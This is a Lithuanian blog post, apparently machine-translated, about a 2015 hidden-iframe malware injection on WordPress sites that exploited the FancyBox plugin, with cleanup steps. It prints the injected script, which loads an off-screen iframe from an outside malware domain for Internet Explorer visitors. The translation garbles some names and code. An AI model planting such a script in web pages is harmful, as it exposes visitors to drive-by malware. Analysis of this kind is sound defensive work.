Savaitės pradžioje svetainių ir tinklaraščių serija su WordPress, gavo įspėjimus apie kenkėjiškų programų infekcija per „Google“ žiniatinklio valdytojai.
Problema, kurioje „Google“ žiniatinklio valdytojai nurodo a buvimą a menkė / scenarijus „iframe“ kenkėjiška programa tinklalapių šaltinyje.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Atrodo, kad tai yra pažeidžiamumas a papildinysįsigyti„FancyBox for WordPress“ kuris iki vakar (2015 05 05) nebuvo atnaujintas ilgą laiką.
Išspręsti šią problemą ir dezinfekuojančios viruso vietos Naudojant šią kenkėjišką programą, ji yra gana paprasta.
1. Išjunkite „Pugl FancyBox“.
2. Ištrinkite visus „FancyBox“ papildinių failus serveryje (per FTP)
3. Įdiekite naują papildinio versiją („FancyBox 3.0.4“)
„Fancox“ „WordPress 3.0.4“
– Pervadintas į nustatymą, kurį paveikė saugumo problema, paminėta 3.0.3. Tai turėtų sustabdyti kenksmingo kodo pasirodymą svetainėse, kuriose papildinys atnaujinamas nenuėmus kenksmingo kodo.
„Fancox“ „WordPress 3.0.3“
– Ištaisyta saugumo problema.
Kenkėjiškų programų informacija:
Tipas: „iframe“ peradresavimas
Tikslas: „WordPress FancyBox“
Kenkėjiškų programų domenas: 203KOKO.EU
Kenkėjiška programa Uri: http://203Koko.eu/hjnfh/ipframe2.php
Kenkėjiškos programos neapdorotas kodas: <Iframe src =”http://203Koko.eu/hjnfh/ipframe2.php” plotis =”20″ aukštis =”30″ ></iframe>
Kenkėjiškų programų scenarijus: <scenarijus>if (navigator.useragent.Match (/msie/i)) {document.write (‘ <Div stilius =”Pozicija: Absoliutus; kairėje: -2000px; plotis: 2000px”>
Pašalinkite kenkėjišką programą iš savo „WordPress“ svetainės.
